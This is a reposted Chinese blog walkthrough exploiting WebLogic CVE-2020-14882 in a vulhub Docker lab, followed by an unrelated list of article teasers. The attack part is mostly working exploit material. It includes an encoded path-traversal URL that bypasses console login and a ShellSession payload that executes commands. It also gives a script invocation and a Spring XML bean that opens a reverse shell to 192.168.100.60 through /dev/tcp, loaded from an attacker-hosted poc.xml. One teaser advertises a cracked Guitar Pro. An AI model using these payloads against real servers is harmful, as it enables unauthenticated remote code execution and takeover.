weblogic漏洞——CVE-2020-14882

weblogic漏洞——CVE-2020-14882

diannao/2024/9/20 9:27:48/文章来源:https://blog.csdn.net/weixin_57379923/article/details/140896143

一、基本信息

靶机：IP：192.168.100.40

二、攻击过程

进入 vulhub 靶场相关目录，并启动环境

cd master/weblogic/CVE-2020-14882
docker-compose up -d

绕过登录验证

http://192.168.100.40:7001/console/css/%252e%252e%252fconsole.portal

上传脚本

http://192.168.100.40:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch%20/tmp/111.txt%27);%22)

进入 docker, 并检查脚本

docker ps -s
docker exec -it d80e4196fdc9 bash
cd /tmp
ls

运行脚本

python CVE-2020-14882_ALL.py -u http://192.168.100.40:7001 -c "whoami"

反弹 shell

方法一：

python CVE-2020-14882_ALL.py -u http://192.168.100.40:7001 -x http://192.168.100.60:1234

方法二：

在 web 服务器中写入 xml 脚本

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/192.168.100.60/7777 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>

浏览器访问

http://192.168.100.40:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://192.168.100.60/poc.xml%22)

作者：PeiyuJue
链接： weblogic漏洞——CVE-2020-14882 – Candid Chronicles
来源：Aaron的博客
版权声明：本博客所有文章除特别声明外，均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有，未经允许请勿转载！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/diannao/53272.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

自己设计的QT系统，留个档

自己设计的QT系统，留个档

注册登录主界面展示天气预报音乐播放

阅读更多...

Guitar Pro 8.2.1 Build 32+Soundbanks Win/Mac音色库开心激活版音乐软件Guitar Pro 8中文破解版

Guitar Pro 8.2.1 Build 32+Soundbanks Win/Mac音色库开心激活版音乐软件Guitar Pro 8中文破解版

音乐软件Guitar Pro 8中文破解版是一个受吉他手喜爱的吉他和弦、六线谱、BASS 四线谱绘制、打印、查看、试听软件，它也是一款优秀的 MIDI 音序器，MIDI 制作辅助工具，可以输出标准格式的 MIDI。GP 的过人之处就在于它可以直接用鼠标和键盘按标…

阅读更多...

echarts多个环形图

echarts多个环形图

echarts图表集 var dataValue [{name:今日待分配方量,value:49}, {name:今日已分配方量,value:602}, {name:今日完成方量,value:1037}]var piedata1 [{name: 1#拌和机,value: 20},{name: 2#拌和机,value: 22},{name: 3#拌和机 ,value: 17},{name: 4#拌和机,value: 18},{name…

阅读更多...

二、搭建网站服务器超详细步骤——部署轻量应用服务器（Centos）

二、搭建网站服务器超详细步骤——部署轻量应用服务器（Centos）

前言经过第一篇博客的铺垫，现在小伙伴们已经选择了合适的服务器和域名，那么这篇博客就要详细的讲解，如何部署轻量应用服务器，为什么要选择Linux系统？为什么要选择CentOS作为系统镜像？ 一、轻量应用服务器…

阅读更多...

PCI Express 体系结构导读摘录（二）

PCI Express 体系结构导读摘录（二）

系列文章目录 PCI Express 体系结构导读摘录（一） PCI Express 体系结构导读摘录（二） 文章目录系列文章目录第Ⅱ篇　 PCI Express 体系结构概述第 4 章　 PCIe 总线概述4. 1　 PCIe 总线的基础知识4. 1. 1　端到端的数据传递4. 1…

阅读更多...

【SLAM】GNSS的定义，信号原理以及RTK在多传感器融合中的使用方法

【SLAM】GNSS的定义，信号原理以及RTK在多传感器融合中的使用方法

【SLAM】GNSS的定义，信号原理以及在多传感器融合中的使用方法 1. GNSS的定义2. GNSS信号原理3. RTK - Real Time Kinematic4。如何使用RTK做融合和优化 1. GNSS的定义 GPS（Global Positioning System）和GNSS（Global Navigation …

阅读更多...

为啥给的贷款额度差距那么大？机构到底是怎么决定给你多少额度？

为啥给的贷款额度差距那么大？机构到底是怎么决定给你多少额度？

今日，我们深入探讨一个颇为引人入胜的话题——为何在不同银行或信贷机构申请贷款时，所能获得的额度竟能如此大相径庭？同时，揭秘这些金融机构背后是如何精密计算并决定每位申请者的“额度”的。以下内容干货满满，建议收…

阅读更多...

【时时三省】(C语言基础)指针进阶例题2

【时时三省】(C语言基础)指针进阶例题2

山不在高，有仙则名。水不在深，有龙则灵。 ----CSDN 时时三省第一个arr 数组名相当于首元素地址因为他没有放到strlen内部也没有取地址 strlen是找＼0 找不到＼0就不会停下来所以它打印的就是随机值第二个arr0 首元素地址加零还…

阅读更多...

Linux-(系统启动、用户管理)

Linux-(系统启动、用户管理)

目录前言关机&重启命令基本介绍注意细节用户登录和注销注意： 用户管理基本介绍添加用户指定/修改密码删除用户查询用户信息切换用户查看当前用户登录用户用户组新增组删除组查看所有组修改用户所属组创建用户时指定用户…

阅读更多...

磁盘加密工具 | VeraCrypt v1.26.15 绿色版

磁盘加密工具 | VeraCrypt v1.26.15 绿色版

VeraCrypt 是一个开源项目，旨在提供强大的加密解决方案，以创建和管理加密的磁盘分区和加密容器。它继承了著名的加密软件 TrueCrypt 的特性，并在此基础上进行了扩展和改进。主要特性 1. 高级加密算法 VeraCrypt 支持多种加密算法&#xf…

阅读更多...

面试软件测试需要掌握的技能有哪些？

面试软件测试需要掌握的技能有哪些？

一、测试用例的编写 1、在测试中最重要的文档，他是测试工作的核心，是一组在测试时输入输出的标准，是软件需求的具体对照。编写测试用例，是测试人员的基本功，真正能写好的人并不多。测试用例包含的内容： …

阅读更多...

Mindspore 初学教程 - 3. Tensor 张量

Mindspore 初学教程 - 3. Tensor 张量

张量（Tensor）是一个可用来表示在一些矢量、标量和其他张量之间的线性关系的多线性函数，这些线性关系的基本例子有内积、外积、线性映射以及笛卡儿积。其坐标在 n n n 维空间内，有 n r n^{r} nr 个分量的一种量，其…

阅读更多...

学习日志8.30--防火墙NAT

学习日志8.30--防火墙NAT

目录一、实验环境配置二、配置防火墙静态NAT一对一三、配置防火墙静态NAT多对多四、配置防火墙NAT端口转换NAPT 五、防火墙smart-nat、easyip 六、防火墙三元组NAT 在学习过基于路由器的NAT网络地址转换，现在学习基于防火墙NAT的网络地址转换，…

阅读更多...

纵向合并单元格——table

纵向合并单元格——table

将list数据处理成tableDate格式，id重复的数据，只有第一项有num字段（num是重复的个数）渲染表格，纵向合并第1、2、6列，id相同的合并 <template><div><el-table:data"tableData":sp…

阅读更多...

实体店同城商家引流的获客方法

实体店同城商家引流的获客方法

实体店同城商家引流的获客方法学会这3招，门店也能轻松获客！ #狂潮老师#电商#代运营#陪跑#门店获客#同城引流#爆款#引流#福利#达人#标签#短视频#直播#私域推荐阅读： 百收网SEO引流脚本软件不断更新（推广全集教程）h…

阅读更多...

4.sklearn-K近邻算法、模型选择与调优

4.sklearn-K近邻算法、模型选择与调优

文章目录环境配置（必看）头文件引用1.sklearn转换器和估计器1.1 转换器 - 特征工程的父类1.2 估计器(sklearn机器学习算法的实现) 2.K-近邻算法2.1 简介：2.2 K-近邻算法API2.3 K-近邻算法代码2.4 运行结果2.5 K-近邻算法优缺点 3.模型选择与调…

阅读更多...

数组与贪心算法——605、121、122、561、455、575（5简1中）

数组与贪心算法——605、121、122、561、455、575（5简1中）

605. 种花问题（简单） 假设有一个很长的花坛，一部分地块种植了花，另一部分却没有。可是，花不能种植在相邻的地块上，它们会争夺水源，两者都会死去。给你一个整数数组 flowerbed 表示花坛&#xf…

阅读更多...

golang zap日志模块封装sentry

golang zap日志模块封装sentry

我们自己写个log日志包，把zap和sentry封装到一起。下面直接贴上主要部分代码（两个模块初始化部分的代码请自行查阅官方文档）： logger.go package logimport ("github.com/getsentry/sentry-go""go.uber.org/zap…

阅读更多...

Mapmost让你实现地图标注自由

Mapmost让你实现地图标注自由

最近在勤勤恳恳（moyuhaushui）搬砖之余，偶然间看到一个在线古籍图书馆，虽然对文言文阅读的心理障碍不亚于英文阅读理解，但网站中有很多历史图集还是引起了兴趣。比如这幅《水经注图》，顺藤摸瓜的瞧&#xff…

阅读更多...

Java中对象拷贝的深度解析：从零拷贝到深拷贝的演进

Java中对象拷贝的深度解析：从零拷贝到深拷贝的演进

前言在Java编程世界中，对象的拷贝是一个基础而重要的操作。它涉及到内存管理、数据一致性以及程序的健壮性等多个方面。随着软件架构的复杂化和数据的多样化，对象拷贝的策略也从最初的简单赋值（零拷贝）发展到深拷贝，…

阅读更多...

推荐文章

最新文章